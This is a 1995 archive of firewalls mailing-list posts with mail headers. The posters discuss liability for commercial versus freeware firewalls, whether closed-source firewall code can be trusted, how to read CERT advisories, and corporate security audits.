8 Sep 1995 07:13:24 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19440 for ; Fri, 8 Sep 1995 07:13:21 -0700 Received: from uucp4.UU.NET by relay3.UU.NET with SMTP id QQzghs24194; Fri, 8 Sep 1995 10:11:56 -0400 Received: from rsca.UUCP by uucp4.UU.NET with UUCP/RMAIL ; Fri, 8 Sep 1995 10:11:56 -0400 Received: by mailhub.rsca.com (8.6.9/rsca1.1f) id KAA21685; Fri, 8 Sep 1995 10:07:32 -0400 Date: Fri, 8 Sep 1995 10:07:32 -0400 From: Steve Marquess Message-Id: <199509081407.KAA21685@mailhub.rsca.com> To: dannyc@gmap.leeds.ac.uk, firewalls@greatcircle.com Subject: Re: upgrade to commercial firewalls Cc: uunet!gmap3!dannyc@gmap.leeds.ac.uk Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Danny Cox >Date: Fri, 8 Sep 1995 12:45:48 +0100 >To: firewalls@greatcircle.com >Subject: upgrade to commercial firewalls >Cc: uunet!gmap3!dannyc >Sender: firewalls-owner@GreatCircle.COM >Precedence: bulk > >Management here seems to have a healthy attitude to security - bordering on >the paranoid if anything, but willing to spend the money, which is good. > >Just talking now with one of the senior managers .. our current situation is >that I've built a firewall router using SOCKS .. my next step may have been >to upgrade using the TIS fwtk stuff .. > >Interesting comment though from him, which in my naivete I'd not thought >about. If we get attacked and lose software/data etc, then who's liable ? >If we use freeware products, then noone is. If we use a commercial product, >then we can, I guess, sue the firewall supplier ... ? At least that was >his comment, and I'd be very interested to hear what you all think to this >concept. This is based on the idea that they'd be covered by their indemnity >insurance ... > >Thanks all, I appreciate your time, >Danny This exact same point has been raised repeatedly at my company, a large financial services firm with a "healthy bordering on paranoid" concern about security. The ability to assign blame in the event of problems is a very significant consideration in the acquisition of important systems and services. And if you think about it from the management point of view there is a certain logic to it: if we suffer a business loss due to the failure of "home grown" or "roll your own" (terms of disparagement here...) software then the blame must fall on those permitting/approving/performing that software development. If a commercially acquired and configured product failed then it's just "well, vendor X let us down again". A fairly common and believable situation here. The possibility of actually collecting financial damages seems to be less important than the exculpatory assignment of responsibility. I don't think anyone really thinks we could pry money out of a major vendor because of software defects, especially not for incidental damages. Keep in mind also that any significant decisions about deploying a firewall will be made by upper management, all business types far removed from any close appreciation of the technical nuances. With all the confusing and conflicting advice and information they get from vendors, trade rags, and in-house staff they really don't what to believe. Those of us in the boiler room are close to the issues and have definite opinions, but we are only a small piece of the real decision process. The bigger and better known the vendor the more powerful the attraction of this argument. Hence a strong predisposition to well known and well marketed products, with cost and product quality often very secondary considerations. Steve Marquess steve@tdg.rsca.com Residential Services Corp. of America 7445 New Technology Way (301) 815-6219 voice Frederick, MD 21701 (301) 815-6515 fax From firewalls-owner Fri Sep 8 08:31:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19837 for firewalls-outgoing; Fri, 8 Sep 1995 07:41:33 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19830 for ; Fri, 8 Sep 1995 07:41:30 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id JAA12926 for GreatCircle.COM!firewalls; Fri, 8 Sep 1995 09:28:53 -0500 Received: by ris1.nmti.com (smail2.5) id AA00656; 8 Sep 95 09:04:30 CDT (Fri) Received: by sonic.nmti.com; id AA03877; Fri, 8 Sep 1995 09:31:08 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509081431.AA03877@sonic.nmti.com.nmti.com> Subject: Re: Firewall-1 concerns To: ormat1@zeus.datasrv.co.il (ORMAT) Date: Fri, 8 Sep 1995 09:31:07 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "ORMAT" at Sep 8, 95 01:45:46 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 217 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > 3. The question here is a legit one, how can you trust a firewall when > you don't know what the code looks like? Please, let's not have that flame war again. I think everyone knows the pros and cons by now... From firewalls-owner Fri Sep 8 09:00:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21707 for firewalls-outgoing; Fri, 8 Sep 1995 08:46:02 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA21688 for ; Fri, 8 Sep 1995 08:45:57 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id IAA09003; Fri, 8 Sep 1995 08:34:48 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma009001; Fri Sep 8 08:34:45 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id IAA00508; Fri, 8 Sep 1995 08:32:15 -0700 Date: Fri, 8 Sep 1995 08:32:15 -0700 From: Brian Murrell Message-Id: <199509081532.IAA00508@mocha.bctel.net> To: firewalls@GreatCircle.COM, dannyc@gmap.leeds.ac.uk Subject: Re: upgrade to commercial firewalls Cc: gmap3!dannyc@uunet.uu.net X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Interesting comment though from him, which in my naivete I'd not thought > about. If we get attacked and lose software/data etc, then who's liable ? Oh goody. I'd love to see this one hashed out, although I think it'll be relevant to firewalls for a day or two tops. :-) > If we use freeware products, then noone is. If we use a commercial product, > then we can, I guess, sue the firewall supplier ... ? At least that was > his comment, and I'd be very interested to hear what you all think to this > concept. This is based on the idea that they'd be covered by their indemnity > insurance ... Good luck. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5262 From firewalls-owner Fri Sep 8 09:03:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA22435 for firewalls-outgoing; Fri, 8 Sep 1995 09:00:38 -0700 Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA22403 for ; Fri, 8 Sep 1995 09:00:25 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id KAA13930; Fri, 8 Sep 1995 10:27:56 -0400 Date: Fri, 8 Sep 1995 10:27:56 -0400 From: Ted Doty Message-Id: <199509081427.KAA13930@kgbvax.network.com> To: steve@rsca.com, dannyc@gmap.leeds.ac.uk, firewalls@greatcircle.com Subject: Re: upgrade to commercial firewalls In-Reply-To: Mail from 'Steve Marquess ' dated: Fri, 8 Sep 1995 10:07:32 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve Marquess writes: > >From: Danny Cox > > > >Interesting comment though from him, which in my naivete I'd not thought > >about. If we get attacked and lose software/data etc, then who's liable ? > >If we use freeware products, then noone is. If we use a commercial product, > >then we can, I guess, sue the firewall supplier ... ? At least that was > >his comment, and I'd be very interested to hear what you all think to this > >concept. This is based on the idea that they'd be covered by their indemnity > >insurance ... > > This exact same point has been raised repeatedly at my company, a large financial > services firm with a "healthy bordering on paranoid" concern about security. > The ability to assign blame in the event of problems is a very significant > consideration in the acquisition of important systems and services. And if [snip] So long as people keep thinking that a magic box will solve all their present and future security worries, assigning blame is a somewhat humorous exercise in futility. Also, as long as 80% (or whatever the current number is ... send your flames to /dev/null) of all "break-ins" are internal, and as long as only 5% (same comment as above) of all corporate security policies are detailed enough to actually implement something from, you probably are barking up the wrong tree. Most of the security consultants will tell you that a firewall will help, but your security is ultimately your own responsibility. Get a policy, implement it, track it, tell your users what it is, keep your eye on bugtraq, (...) and you'll be in pretty good shape. This doesn't mean that you won't get hacked, or that you won't lose data (you mean that disaster recovery isn't in your policy either?). Without the above, liability is probably hard to demonstrate. -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Fri Sep 8 09:31:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA22977 for firewalls-outgoing; Fri, 8 Sep 1995 09:24:10 -0700 Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA22969 for ; Fri, 8 Sep 1995 09:24:07 -0700 Received: from paragon-systems.com (sundevil.paragon-systems.com [199.125.207.2]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id MAA29333; Fri, 8 Sep 1995 12:22:27 -0400 Received: from sandfiddler.paragon-systems.com by paragon-systems.com (4.1/SMI-4.1) id AA01287; Fri, 8 Sep 95 12:25:18 EDT Received: by sandfiddler.paragon-systems.com (5.x/SMI-SVR4) id AA00414; Fri, 8 Sep 1995 12:17:45 -0400 Date: Fri, 8 Sep 1995 12:17:45 -0400 From: rmck@sandfiddler.paragon-systems.com (Bob McKisson) Message-Id: <9509081617.AA00414@sandfiddler.paragon-systems.com> To: nobody@REPLAY.COM, proff@suburbia.net Subject: Re: Firewall-1 concerns Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > It may be that the Masad has free reign to get into you network! To the guy who just woke up to the fact that FW-1 is Israeli code, don't feel stupid by yourself pal. If you can believe this, the Department of Defense Comptrollers Office just bought one of those things on the advise of one of the biggest and well known government information system security experts on the Beltway. Defense finance information being protected by Israeli code. In my view it ain't the MOSSAD (Ministry of State Security and Defense) you should be worried about. rmck From firewalls-owner Fri Sep 8 10:03:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA23565 for firewalls-outgoing; Fri, 8 Sep 1995 09:42:24 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA23557; Fri, 8 Sep 1995 09:42:19 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 8 Sep 1995 09:41:37 -0800 To: "Bryan D. Boyle" , firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Interpreting CERT advisories Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 7:51 AM 9/8/95, Bryan D. Boyle wrote: >We will not even begin to discuss the OS it runs on...which seems to be >the ongoing topic of CERT alerts du jour. That's the wrong way to interpret CERT advisories. CERT advisories are about security FIXES, not about security PROBLEMS, and the fixes are produced with the cooperation of the vendors in question. The fact that there are lots of CERT advisories for a given vendor doesn't (necessarily) mean that vendor is somehow less secure; it _does_ means that the vendor is more willing than others to cooperate with CERT in producing advisories (which I think is a feature, not a bug). -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Fri Sep 8 10:03:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA23124 for firewalls-outgoing; Fri, 8 Sep 1995 09:30:27 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA23117 for ; Fri, 8 Sep 1995 09:30:22 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA10182; Fri, 8 Sep 95 12:15:19 -0400 Date: Fri, 8 Sep 95 12:15:18 -0400 Message-Id: <9509081615.AA10182@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Software concerns Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> 3. The question here is a legit one, how can you trust a firewall when >> you don't know what the code looks like? >Please, let's not have that flame war again. I think everyone knows the >pros and cons by now... Think this is an important issue and not necessarily a flame war. I personally would not buy security software from anyone unless at least one of the following conditions were met: 1) Can review the source code and verify that this matches the product. 2) Trust the vendor. 3) Product has been reviewed (as in 1) by someone trusted. (1) is obviously the most rigorous but also the most time consuming. (2) is more involved & generally requires being personally acquainted with the principals. Biggest problem is proving that they are free from outside interests/pressures. (3) being in the USA I would trust a review by the NSA and a very few others. Buying security is different from buying a wordprocessor and must be weighed against what is at risk and the effect on your customer base if an exception occurs. Obviously this is going to have different values for an .EDU as opposed to a DoD contractor (well maybe if the .EDU relies on grants...). Many remember WYSIWYG - my motto is WYDSIWGY "What you don't see is what gets you". Warmly, Padgett ps 10,000,000 lemmings can't be rong. From firewalls-owner Fri Sep 8 11:01:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA25395 for firewalls-outgoing; Fri, 8 Sep 1995 10:31:22 -0700 Received: from nda.nda.com (fw1.nda.COM [204.57.47.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA25388 for ; Fri, 8 Sep 1995 10:31:19 -0700 Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id NAA00457; Fri, 8 Sep 1995 13:29:48 -0400 From: David Kovar Message-Id: <199509081729.NAA00457@nda.nda.com> Subject: Re: Firewall-1 concerns To: iceman@MBnet.MB.CA (Oliver Friedrichs) Date: Fri, 8 Sep 1995 13:29:48 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Oliver Friedrichs" at Sep 8, 95 12:22:09 pm X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 518 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Someone seriously without a clue, is more like it. > > You have proof this isn't so ? No - it's a valid point, unless you want > to send me source code so I can check myself. > > - I reacted hastily and without thought. What I should have said is that this issue has been hashed, and rehashed many times on this list and that posting what appears to be flame-bait anonymously isn't going to help resolve the issue I appologize for my rash statement. -David From firewalls-owner Fri Sep 8 11:02:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA26313 for firewalls-outgoing; Fri, 8 Sep 1995 10:56:53 -0700 Received: from sdwsys (lig.cinti.net [204.248.145.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA26297 for ; Fri, 8 Sep 1995 10:56:49 -0700 Received: by sdwsys (Linux Smail3.1.28.1 #20) id m0sr85L-0009yvC; Fri, 8 Sep 95 14:23 EDT Message-Id: From: sdw@lig.net (Stephen D. Williams) Subject: Re: linux vs. *bsd for secure networking system To: blymn@awadi.com.AU (Brett Lymn) Date: Fri, 8 Sep 1995 14:23:30 -0400 (EDT) Cc: Marius@doulosgeri.com, firewalls@greatcircle.com In-Reply-To: <9509060236.AA17739@bunya.awadi> from "Brett Lymn" at Sep 6, 95 12:06:36 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1571 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > According to Marius: > > > >weak points, just like everything else does, but I just wanted to say > >a few words in its defense... > > > > A very reasonable response! > > And to redress Karl's omission - you can also go the path of NetBSD > which, unlike FreeBSD, has ports to a whole gaggle of different > machines - not just PC's. The ports that are running are listed on > the WWW page at www.netbsd.org, ones I can remember are Mac, Suns, > Amiga, some HP boxen - there are others. Once you have installed a distribution and actually started using it, it doesn't make sense to think about distributions: I just update kernel, compiler, libraries, utilities, etc. as they are updated. Distributions are always behind the curve quite a bit. > Brett Lymn, Computer Systems Administrator, AWA Defence Industries > =============================================================================== > "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got > three hundred and sixty three elephants, fifty carts of forage, the > monsoon's about to break and we're wearing ... we're wearing ... sort > of things, like glass, only dark... dark glass things on our eyes..." > - Terry Pratchett "Moving Pictures". > > > -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From firewalls-owner Fri Sep 8 11:32:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA26747 for firewalls-outgoing; Fri, 8 Sep 1995 11:17:23 -0700 Received: from internet.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA26739 for ; Fri, 8 Sep 1995 11:17:18 -0700 Date: Fri, 8 Sep 1995 11:17:18 -0700 Message-Id: <199509081817.LAA26739@miles.greatcircle.com> X-Authentication-Warning: internet: Host perseids.milkyway.com claimed to be [192.168.77.77] From: "Hung Vu" Reply-To: "Hung Vu" To: dannyc@gmap.leeds.ac.uk Cc: firewalls@greatcircle.com Subject: Re: upgrade to commercial firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Ok .. so given that ... we have a need for a commercially available firewall > product. HELP! I don't even begin to know well, how to evaluate them .. Send a message to info@milkyway.com to request for more information on the Black Hole from Milkyway Networks Corporation. The Black Hole is currently being certified for an AL-1 security level from the Common Criteria which is recognized by the G-7 countries. Hung. From firewalls-owner Fri Sep 8 11:32:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA27087 for firewalls-outgoing; Fri, 8 Sep 1995 11:27:12 -0700 Received: from datasrv.co.il (zeus.datasrv.co.il [192.114.20.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA27080 for ; Fri, 8 Sep 1995 11:27:05 -0700 Received: by datasrv.co.il id AA14398 (5.65c/IDA-1.4.4 for firewalls@greatcircle.com); Fri, 8 Sep 1995 20:25:15 +0300 Date: Fri, 8 Sep 1995 20:25:11 +0300 (IDT) From: ORMAT Subject: Re: Firewall-1 concerns To: Bob McKisson Cc: firewalls@greatcircle.com In-Reply-To: <9509081617.AA00414@sandfiddler.paragon-systems.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 8 Sep 1995, Bob McKisson wrote: [snip] > information being protected by Israeli code.In my view it ain't the > MOSSAD (Ministry of State Security and Defense) you should be worried > about. > > rmck > It's nice to see you found meaning in the letters of the word Mosad, but it's not even an english word (and defenatly not spelled with capital letters). The word is in hebrew and means 'firm' or 'agency'. I know this is off topic, but i just couldn't help myself. Arik From firewalls-owner Fri Sep 8 12:00:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA26643 for firewalls-outgoing; Fri, 8 Sep 1995 11:13:19 -0700 Received: from pnh10.med.navy.mil ([164.167.53.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA26630 for ; Fri, 8 Sep 1995 11:13:11 -0700 Received: from mclo11 (mclo11.med.navy.mil) by pnh10.med.navy.mil with SMTP id AA03220 (5.65c/IDA-1.4.4 for ); Fri, 8 Sep 1995 13:57:31 -0400 Message-Id: <199509081757.AA03220@pnh10.med.navy.mil> X-Sender: pnh1rgr@mclo10.med.navy.mil Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 08 Sep 1995 14:07:10 -0400 To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security), firewalls@greatcircle.com From: pnh1rgr@mclo10.med.navy.mil (Bob Resino) Subject: Re: Software concerns X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [Snip] >3) Product has been reviewed (as in 1) by someone trusted. > >(1) is obviously the most rigorous but also the most time consuming. >(2) is more involved & generally requires being personally acquainted > with the principals. Biggest problem is proving that they are free > from outside interests/pressures. >(3) being in the USA I would trust a review by the NSA and a very few others. Don't know if I could trust them Padgett. DISA took NSA at there word about C2 WIN NT(AS) 3.5 and didn't look real close at the platform it was submitted on. DISA has now approved the installation of NT boxes on DISN. For more info, see the 4 Sept issue of Government Computer News. > >Buying security is different from buying a wordprocessor and must be weighed >against what is at risk and the effect on your customer base if an >exception occurs. Obviously this is going to have different values for >an .EDU as opposed to a DoD contractor (well maybe if the .EDU relies >on grants...). > >Many remember WYSIWYG - my motto is WYDSIWGY "What you don't see is what >gets you". > > Warmly, > Padgett > >ps 10,000,000 lemmings can't be rong. pps: ...nothing up my sleeve. Hey Rockie, watch me pull a rabbit out of my hat... B. Moose --------------------------------------------------------------- Bob Resino (RGR24) pnh1rgr@pnh10.med.navy.mil (804)398-7400 Healthcare Support Office Fax:(804)398-7265 Medical Construction Liaison Department Management Information / Data-telecommunciations Div (Code 55) 6500 Hampton Blvd "To be or not to be... Norfolk, VA 23707 What was the question ?" --------------------------------------------------------------- The opinions are mine, NOT those of the Navy or the Healthcare Support Office. If they happen to be the same, its got to be coincidence! From firewalls-owner Fri Sep 8 12:02:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA28099 for firewalls-outgoing; Fri, 8 Sep 1995 11:43:04 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA28083 for ; Fri, 8 Sep 1995 11:42:57 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA28078; Fri, 8 Sep 1995 14:41:30 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA08188; Fri, 8 Sep 1995 14:41:27 -0400 Message-Id: <9509081841.AA08188@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@GreatCircle.COM Date: Fri, 8 Sep 1995 14:40:28 -0500 Subject: Re: Firewall-1 concerns Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rumour has it that on 8 Sep 95 at 9:31, Peter da Silva said: > > 3. The question here is a legit one, how can you trust a firewall when > > you don't know what the code looks like? > > Please, let's not have that flame war again. I think everyone knows the > pros and cons by now... Perhaps to be added to the FAQ...? -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## The more I learn, the less I know. ## ## Eventually I'll know everything about nothing. ## From firewalls-owner Fri Sep 8 12:28:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA28327 for firewalls-outgoing; Fri, 8 Sep 1995 11:50:06 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA28319 for ; Fri, 8 Sep 1995 11:49:58 -0700 From: dmurphy@coltrane.cwa.com Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA10840; Fri, 8 Sep 95 14:48:21 -0400 Date: Fri, 8 Sep 95 14:48:20 -0400 Message-Id: <9509081848.AA10840@uvs1.orl.mmc.com> To: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com, padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Subject: Corporate Audits Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gentlebeings, Two threads here ("Software concerns" and "Upgrade commercial firewalls") have both touched today on corporate decision-making wrt firewalls. Just as corp. decisions about HW in the '70's ("No one gets fired for buying IBM."), or desktop SW reached in the '90's ("No one gets fired for buying Microsoft.") kept, um, "sub-optimal" solutions (and vendors) alive past their prime, so today they're buying the "magic bullet" of firewalls as the solution to network security. Warmly Padgett, Almost-Esq., pointed out the "who can you trust" aspect of this behavior, albeit by counter-example. Steve Marquess pointed out the equally important "who can you blame" aspect, which we'd be foolish to overlook (info-sec is, after all, primarily about human, not mechanical, failures). And both aspects indicate that the answer lies, or will soon, in what *corporate auditors* collectively decide is a reasonably prudent business decision in this area. Nobody keeps corporate receipts in a cigar box in the receptionist's desk, in part because (in the US) that would violate the "reasonably prudent" standard of business behavior used to judge if a decision was just bad (management not liable to shareholders) or negligently stupid (management *personally* on the hook). Such legal decisions across the country get composted down into a set of "generally accepted" business practices, which are then enforced by the corporate auditors, whose "cold comfort" letter in the annual report tells shareholders that the corporate procedures they've looked at pass muster, and by later court decisions. So, have any of you big-business wage-slaves had corporate auditors come into your shop and ask questions (perceptive or otherwise) about firewalls and network security yet, and if so, would you be willing/able to share such stories with the list? Better yet, does anybody work for one of the Used-To-Be-Big-7 accounting firms and know what they're doing internally about this? +----------------------------------------------------------------------+ | Dan Murphy | CWA Comm Products | 401 Alberto Wy, Los Gatos, CA 95032 | | Vox: (408) 358-1529 | Fax: (408) 356-7061 | Email: dmurphy@cwa.com | +----------------------------------------------------------------------+ From firewalls-owner Fri Sep 8 12:30:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA29121 for firewalls-outgoing; Fri, 8 Sep 1995 12:08:17 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA29113 for ; Fri, 8 Sep 1995 12:08:11 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA10867; Fri, 8 Sep 95 14:52:01 -0400 Date: Fri, 8 Sep 95 14:52:01 -0400 Message-Id: <9509081852.AA10867@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "dmurphy@coltrane.cwa.com"@UVS1.dnet.mmc.com Cc: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: RE: Corporate Audits Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Warmly Padgett, Almost-Esq., pointed out the "who can you trust" aspect >of this behavior, albeit by counter-example. Steve Marquess pointed out >the equally important "who can you blame" aspect, which we'd be foolish to >overlook Have a few reasons for avoiding that aspect: 1) "Who you gonna blame" deals with revenge/recovery/CYA, something I have little time for. My purpose is to avoid the exception from happening in the first place (not always successful but have never seen finger- pointing to be useful except to demonstrate a need for training). 2) Just the first occupies far more than 40 hours a week. 3) Determining the "fall guy" is rarely a technical issue. >So, have any of you big-business wage-slaves had corporate auditors come >into your shop and ask questions (perceptive or otherwise) about >firewalls and network security yet, and if so, would you be willing/able >to share such stories with the list? Better yet, does anybody work for >one of the Used-To-Be-Big-7 accounting firms and know what they're doing >internally about this? Training the auditors is sometimes part of my job, can be very handy for adopting unpopular/unfunded practices by having a department get giged for something that you just happen to have a no-brane solution. >From what I have seen, the "Big-7" is rapidly becoming a vast horde of "LLP"s - Limited Liability Partnerships with the parent company acting as matchmaker. Don't have to be a rocket scientist to translate that. Warmly, Padgett ps closest I've been lately to being a "shield bearer" is seeing a copy of Black's in a store yesterday. From firewalls-owner Fri Sep 8 12:35:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA00116 for firewalls-outgoing; Fri, 8 Sep 1995 12:29:01 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA29999 for ; Fri, 8 Sep 1995 12:28:48 -0700 From: ris1!nmti.com!peter@uuneo.neosoft.com Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA10992; Fri, 8 Sep 95 15:27:19 -0400 Date: Fri, 8 Sep 95 15:27:19 -0400 Message-Id: <9509081927.AA10992@uvs1.orl.mmc.com> To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson P.E. Information Security) Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com Subject: On Trusting Trust Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > 3) Product has been reviewed (as in 1) by someone trusted. > (3) being in the USA I would trust a review by the NSA and a very few others. The "40 bit keys are all anyone needs" NSA? What's their incentive to encourage good firewalls? The Clipper Chip people? OK folks, imagine there was to be a firewall certification authority. Who would you want them to be? Who do you trust? From firewalls-owner Fri Sep 8 13:22:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA00459 for firewalls-outgoing; Fri, 8 Sep 1995 12:35:00 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA00451 for ; Fri, 8 Sep 1995 12:34:56 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Fri, 08 Sep 1995 19:30:02 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;1014:950908193002] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #518 Message-Id: 